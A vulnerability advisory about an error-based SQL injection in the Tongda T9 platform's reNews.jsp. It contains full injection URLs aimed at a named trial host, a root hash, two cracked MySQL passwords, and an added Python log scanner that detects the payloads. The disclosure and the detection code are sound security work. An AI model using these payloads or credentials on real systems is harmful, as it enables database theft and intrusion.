### Brief description:

The Tongda T9 Smart Management Platform (Standard Edition) has a SQL injection vulnerability.

### Details:

The online trial instance of the Tongda T9 Smart Management Platform (Standard Edition) is at http://t9.go2oa.com:86/t9/login.jsp. After logging in, the page core/funcs/news/show/reNews.jsp is vulnerable to MySQL error-based injection, which can be used to retrieve data from the system.

1. `http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select @@version from flow_sort limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1`

![20140317215933.png](https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png)

2. Dumping the root user's password

`http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 0,1))a from flow_sort group by a)b where 1=1 or '1'='1`

![20140317220353.png](https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png)

The root password hash 91AF99F23C3D4ED85140D100433725DFA52BECEE was successfully retrieved; once cracked it is: myoa888.

![20140317220907.png](https://images.seebug.org/upload/201403/1722092523c80934ac9823dcca54602c606d5470.png)

3. Dumping the password of the MySQL user that is allowed to connect remotely

`http://t9.go2oa.com/t9/core/funcs/news/show/reNews.jsp?seqId=eqId=15' union select '1' from (select count(*),concat(floor(rand(0)*2),0x3a,(select concat(host,user,password) from mysql.user limit 3,1))a from flow_sort group by a)b where 1=1 or '1'='1`

![20140317221251.png](https://images.seebug.org/upload/201403/1722130768d9df2b63b00ea06db0ac66b6f5bc69.png)

Once cracked it is: cms6_8.

No further data was dumped. This injection point runs with fairly high privileges and can retrieve all data in the database.

### Proof of vulnerability:

![20140317215933.png](https://images.seebug.org/upload/201403/17215954973d49f93a6c13ea75782cbd1c44334a.png)

![20140317220353.png](https://images.seebug.org/upload/201403/172204136c42a2dc084f7ed464b6427590c7cb9c.png)
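As an added example (not part of the original advisory or of Tongda's code), the following Python routine scans web-server access-log lines for requests to reNews.jsp whose seqId parameter is not an integer or carries the error-based injection signatures used above (UNION SELECT, floor(rand(0)*2) with GROUP BY, @@version, mysql.user). The signature names, the assumption that seqId must be an integer, and the sample log lines are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Patterns characteristic of the MySQL error-based (duplicate-key) injection shown in the
# advisory: UNION SELECT, floor(rand(0)*2) ... GROUP BY, and reads of @@version or mysql.user.
# Signature names and the integer-parameter list are this example's own assumptions.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.+\bselect\b", re.I | re.S),
    "rand_floor_group_by": re.compile(
        r"floor\s*\(\s*rand\s*\(.*?\)\s*\*\s*2\s*\).*\bgroup\s+by\b", re.I | re.S),
    "version_probe": re.compile(r"@@version", re.I),
    "mysql_user_read": re.compile(r"\bmysql\s*\.\s*user\b", re.I),
}
INTEGER_PARAMS = {"seqid"}  # reNews.jsp should only ever receive seqId as an integer (assumption)
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')


def analyse_url(url):
    """Return {param: [finding, ...]} for one request URL; empty when nothing looks injected."""
    findings = {}
    # parse_qsl splits each pair at the first '=' and percent-decodes, so the whole payload
    # (including the '=' signs inside it) becomes the value of seqId.
    for name, value in parse_qsl(urlsplit(url).query, keep_blank_values=True):
        hits = []
        if name.lower() in INTEGER_PARAMS and not value.strip().isdigit():
            hits.append("non_integer_id")
        hits.extend(sig for sig, pat in SIGNATURES.items() if pat.search(value))
        if hits:
            findings[name] = hits
    return findings


def scan_access_log(lines):
    """Yield (line_number, url, findings) for every log line whose query string trips a check."""
    for number, line in enumerate(lines, start=1):
        match = REQUEST_LINE.search(line)
        if match:
            findings = analyse_url(match.group(1))
            if findings:
                yield number, match.group(1), findings


# Constructed sample log lines (not from the advisory): a benign request, the advisory's first
# payload percent-encoded as a browser would send it, and an unrelated login-page hit.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Mar/2014:21:59:00 +0800] "GET /t9/core/funcs/news/show/reNews.jsp?seqId=15 HTTP/1.1" 200 2048',
    '10.0.0.5 - - [17/Mar/2014:21:59:54 +0800] "GET /t9/core/funcs/news/show/reNews.jsp?seqId=15%27%20union%20select%20%271%27%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a,(select%20@@version%20from%20flow_sort%20limit%203,1))a%20from%20flow_sort%20group%20by%20a)b%20where%201=1%20or%20%271%27=%271 HTTP/1.1" 500 513',
    '10.0.0.9 - - [17/Mar/2014:22:03:53 +0800] "GET /t9/login.jsp HTTP/1.1" 200 1337',
]
```

Running `list(scan_access_log(SAMPLE_LOG))` flags only the second line; the 500 status alongside the flagged request is the other tell-tale of the error-based technique, since the injected data is returned through a MySQL error message.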